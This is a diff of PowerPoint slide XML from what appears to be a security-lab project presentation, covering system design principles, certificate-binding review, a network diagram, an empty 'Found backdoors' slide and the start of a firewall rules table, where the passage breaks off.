--- a/presentation/Präsentation1.pptx
+++ b/presentation/Präsentation1.pptx
@@ -6,6 +6,18 @@
   </p:sldMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
+    <p:sldId id="257" r:id="rId3"/>
+    <p:sldId id="258" r:id="rId4"/>
+    <p:sldId id="259" r:id="rId5"/>
+    <p:sldId id="261" r:id="rId6"/>
+    <p:sldId id="262" r:id="rId7"/>
+    <p:sldId id="263" r:id="rId8"/>
+    <p:sldId id="264" r:id="rId9"/>
+    <p:sldId id="265" r:id="rId10"/>
+    <p:sldId id="266" r:id="rId11"/>
+    <p:sldId id="267" r:id="rId12"/>
+    <p:sldId id="268" r:id="rId13"/>
+    <p:sldId id="269" r:id="rId14"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3172,6 +3184,2274 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="724864649"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Review</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Textfeld 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="946484" y="1350799"/>
+            <a:ext cx="2189622" cy="584776"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>Comparison</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="3200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Bild 4" descr="system_overview_new.pdf"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="133684" y="2085489"/>
+            <a:ext cx="4769407" cy="3088105"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Bild 5" descr="system.pdf"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4903091" y="1764646"/>
+            <a:ext cx="4000500" cy="3556000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1026692" y="5320646"/>
+            <a:ext cx="7555832" cy="1425072"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>User data change</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Backup/Logging</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4180089978"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Comparison</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1012491107"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Found backdoors</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2082681963"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3335244201"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>System design</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Introducing different trust zones</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Security in depth</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Least privilage</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>Assume external systems are insecure &amp; Isolate public access </a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>Minimize exposure </a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1836761697"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>System design</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Bild 3" descr="sysseclab_net_diagram.pdf"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1497263" y="1417638"/>
+            <a:ext cx="6644105" cy="4983079"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4191444827"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>System design</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Review user data change</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" sz="2000" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Binding user data &lt;-&gt; Certificate</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>User data change  breaks binding</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>CA should verify user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Arial"/>
+              <a:buChar char="→"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t> Review for user data change needed</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3183903663"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Implementation</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:graphicFrame>
+        <p:nvGraphicFramePr>
+          <p:cNvPr id="4" name="Tabelle 3"/>
+          <p:cNvGraphicFramePr>
+            <a:graphicFrameLocks noGrp="1"/>
+          </p:cNvGraphicFramePr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1841225430"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGraphicFramePr>
+        <p:xfrm>
+          <a:off x="946484" y="2225850"/>
+          <a:ext cx="7168147" cy="4079240"/>
+        </p:xfrm>
+        <a:graphic>
+          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
+            <a:tbl>
+              <a:tblPr firstRow="1" bandRow="1">
+                <a:tableStyleId>{3C2FFA5D-87B4-456A-9821-1D502468CF0F}</a:tableStyleId>
+              </a:tblPr>
+              <a:tblGrid>
+                <a:gridCol w="2389382"/>
+                <a:gridCol w="1968455"/>
+                <a:gridCol w="2810310"/>
+              </a:tblGrid>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+                        <a:t>Source</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+                        <a:t>Protocol</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+                        <a:t>Destination</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Webserver</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>HTTPS (443)</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
